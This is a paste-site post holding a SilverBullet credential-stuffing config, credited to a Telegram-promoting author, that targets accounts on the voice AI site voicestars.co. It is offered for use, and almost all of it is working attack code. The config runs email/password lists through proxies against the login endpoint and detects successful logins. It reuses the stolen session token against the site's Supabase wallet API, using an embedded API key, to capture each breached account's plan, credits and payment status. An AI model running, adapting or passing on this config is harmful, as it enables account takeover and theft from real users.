voicestars ai
Public
.SVB
YASHVIRGAMING
Dec 29, 2025
8
.SVB
Copy
Save
Share
QR
New
[SETTINGS] { "Name": "voicestars ai", "SuggestedBots": 100, "MaxCPM": 0, "LastModified": "2025-10-26T20:25:43.4388661+04:00", "AdditionalInfo": "Join Telegrram: https://t.me/OFFICIALYASHVIRGAMING_GROUPCHAT", "RequiredPlugins": [], "Author": "🔥 @therealyashvirgaming 🔥", "Version": "1.1.4 [SB]", "SaveEmptyCaptures": false, "ContinueOnCustom": false, "SaveHitsToTextFile": false, "IgnoreResponseErrors": false, "MaxRedirects": 8, "NeedsProxies": true, "OnlySocks": false, "OnlySsl": false, "MaxProxyUses": 0, "BanProxyAfterGoodStatus": false, "BanLoopEvasionOverride": -1, "EncodeData": false, "AllowedWordlist1": "MailPass", "AllowedWordlist2": "Default", "DataRules": [], "CustomInputs": [ { "Description": "Join Telegrram: https://t.me/OFFICIALYASHVIRGAMING_GROUPCHAT", "VariableName": "", "Id": 1857410931 } ], "CaptchaUrl": "", "IsBase64": false, "FilterList": [], "EvaluateMathOCR": false, "SecurityProtocol": 0, "ForceHeadless": false, "AlwaysOpen": false, "AlwaysQuit": false, "QuitOnBanRetry": false, "AcceptInsecureCertificates": true, "DisableNotifications": false, "DisableImageLoading": false, "DefaultProfileDirectory": false, "CustomUserAgent": "", "RandomUA": false, "CustomCMDArgs": "", "Title": "voicestars ai", "IconPath": "Icon\\svbfile.ico", "LicenseSource": null, "Message": null, "MessageColor": "#FFFFFFFF", "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]", "AuthorColor": "#FFFFB266", "WordlistColor": "#FFB5C2E1", "BotsColor": "#FFA8FFFF", "CustomInputColor": "#FFD6C7C7", "CPMColor": "#FFFFFFFF", "ProgressColor": "#FFAD93E3", "HitsColor": "#FF66FF66", "CustomColor": "#FFFFB266", "ToCheckColor": "#FF7FFFD4", "FailsColor": "#FFFF3333", "RetriesColor": "#FFFFFF99", "OcrRateColor": "#FF4698FD", "ProxiesColor": "#FFFFFFFF" } [SCRIPT] #LOGIN REQUEST POST "https://www.voicestars.co/login?/login&redirect=/" Multipart STRINGCONTENT "email: <USER>" STRINGCONTENT "password: <PASS>" BOUNDARY "----WebKitFormBoundarynQ0jUaS3G0XoEnA1" HEADER "Host: www.voicestars.co" HEADER "Accept-Encoding: gzip, deflate, br" HEADER "Accept-Language: en-MU,en-GB;q=0.9,en-US;q=0.8,en;q=0.7" HEADER "Connection: keep-alive" HEADER "Content-Length: 266" HEADER "Content-Type: multipart/form-data; boundary=----WebKitFormBoundarynQ0jUaS3G0XoEnA1" HEADER "Origin: https://www.voicestars.co" HEADER "Referer: https://www.voicestars.co/login" HEADER "Sec-Fetch-Dest: empty" HEADER "Sec-Fetch-Mode: cors" HEADER "Sec-Fetch-Site: same-origin" HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" HEADER "accept: application/json" HEADER "sec-ch-ua: \"Not A(Brand\";v=\"99\", \"Google Chrome\";v=\"121\", \"Chromium\";v=\"121\"" HEADER "sec-ch-ua-mobile: ?0" HEADER "sec-ch-ua-platform: \"Windows\"" HEADER "x-sveltekit-action: true" KEYCHECK KEYCHAIN Failure OR KEY "Invalid login credentials" KEY "\"status\":400," KEY "failure" KEYCHAIN Success OR KEY "\"status\":303," KEY "redirect" #sb-auth-token PARSE "<COOKIES(sb-auth-token)>" LR "" "" -> VAR "sb-auth-token" #access_token PARSE "<sb-auth-token>" LR "%5B%22" "%22%2C%22" -> VAR "TK" #SETTINGS REQUEST GET "https://www.voicestars.co/settings/__data.json?x-sveltekit-invalidated=01" HEADER "Host: www.voicestars.co" HEADER "Connection: keep-alive" HEADER "sec-ch-ua-platform: \"Windows\"" HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36" HEADER "Accept: */*" HEADER "DNT: 1" HEADER "sec-ch-ua: \"Google Chrome\";v=\"141\", \"Not?A_Brand\";v=\"8\", \"Chromium\";v=\"141\"" HEADER "sec-ch-ua-mobile: ?0" HEADER "Sec-Fetch-Site: same-origin" HEADER "Sec-Fetch-Mode: cors" HEADER "Sec-Fetch-Dest: empty" HEADER "Referer: https://www.voicestars.co/" HEADER "Accept-Language: en-US,en;q=0.9" HEADER "Cookie: _ga=GA1.1.662060776.1761494426; sib_cuid=0c8ba7f5-7758-46f5-a468-8906ca162b8c; _fbp=fb.1.1761494426409.486323675789940933; __stripe_mid=e43648c1-ce84-44ca-98a2-2e150a770ca3aa66b7; __stripe_sid=5d6f5530-1a8a-4a20-a4f5-ed2f7416f6b5ed9dfb; sb-auth-token=<sb-auth-token>; _ga_JTRGDJ8XN9=GS2.1.s1761494426$o1$g1$t1761495009$j36$l0$h0" HEADER "Accept-Encoding: gzip, deflate" PARSE "<SOURCE>" LR "\"subscriptionTypes\":" "}" -> VAR "1" PARSE "<SOURCE>" LR "\":<1>}," "," -> VAR "2" #UID PARSE "<SOURCE>" LR "\"subscriptionTypes\":<1>},<2>,\"" "\"," -> VAR "UID" #WALLET REQUEST GET "https://wjtracjpjzokambcsqdz.supabase.co/rest/v1/wallets?select=*%2CsubscriptionTypes%28*%29&user_id=eq.<UID>" HEADER "Host: wjtracjpjzokambcsqdz.supabase.co" HEADER "Connection: keep-alive" HEADER "sec-ch-ua-platform: \"Windows\"" HEADER "authorization: Bearer <TK>" HEADER "sec-ch-ua: \"Google Chrome\";v=\"141\", \"Not?A_Brand\";v=\"8\", \"Chromium\";v=\"141\"" HEADER "sec-ch-ua-mobile: ?0" HEADER "x-client-info: @supabase/auth-helpers-sveltekit@0.9.4" HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36" HEADER "accept: application/vnd.pgrst.object+json" HEADER "accept-profile: public" HEADER "apikey: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJzdXBhYmFzZSIsInJlZiI6IndqdHJhY2pwanpva2FtYmNzcWR6Iiwicm9sZSI6ImFub24iLCJpYXQiOjE2ODMyMzQzNzEsImV4cCI6MTk5ODgxMDM3MX0.ZJKpWcExZ7cBfwd-my2V8Gh2WLXiDFaNGT2NxE4dFuI" HEADER "Origin: https://www.voicestars.co" HEADER "Sec-Fetch-Site: cross-site" HEADER "Sec-Fetch-Mode: cors" HEADER "Sec-Fetch-Dest: empty" HEADER "Referer: https://www.voicestars.co/" HEADER "Accept-Language: en-US,en;q=0.9" HEADER "Accept-Encoding: gzip, deflate" #memberSince PARSE "<SOURCE>" LR "\"created_at\":\"" "T" CreateEmpty=FALSE -> CAP "memberSince" #isActive PARSE "<SOURCE>" LR "\"isActive\":" "," CreateEmpty=FALSE -> CAP "isActive" #Redeemed_free_credits PARSE "<SOURCE>" LR "\"redeemed_free_credits\":" "," CreateEmpty=FALSE -> CAP "Redeemed_free_credits" #Plan PARSE "<SOURCE>" LR "\"label\":\"" "\"" CreateEmpty=FALSE -> CAP "Plan" #Credits PARSE "<SOURCE>" LR "\"credits\":" "," Recursive=TRUE CreateEmpty=FALSE -> CAP "Credits" #Free_Credits PARSE "<SOURCE>" LR "\"free_credits\":" "," CreateEmpty=FALSE -> CAP "Free Credits" #Custom_model_credits PARSE "<SOURCE>" LR "\"custom_model_credits\":" "," CreateEmpty=FALSE -> CAP "Custom_model_credits" #PAYMENTS IF "<SOURCE>" Contains "\"stripe_customer_id\":null," FUNCTION Constant "False" -> CAP "Has Payment" ELSE FUNCTION Constant "True" -> CAP "Has Payment" ENDIF #isRecurrent PARSE "<SOURCE>" LR "\"isRecurrent\":" "," CreateEmpty=FALSE -> CAP "isRecurrent" #AUTHOR SET CAP "Config By " "🔥 @therealyashvirgaming 🔥"
Scan to View
Use your phone's camera or a QR scanner app to open this paste instantly.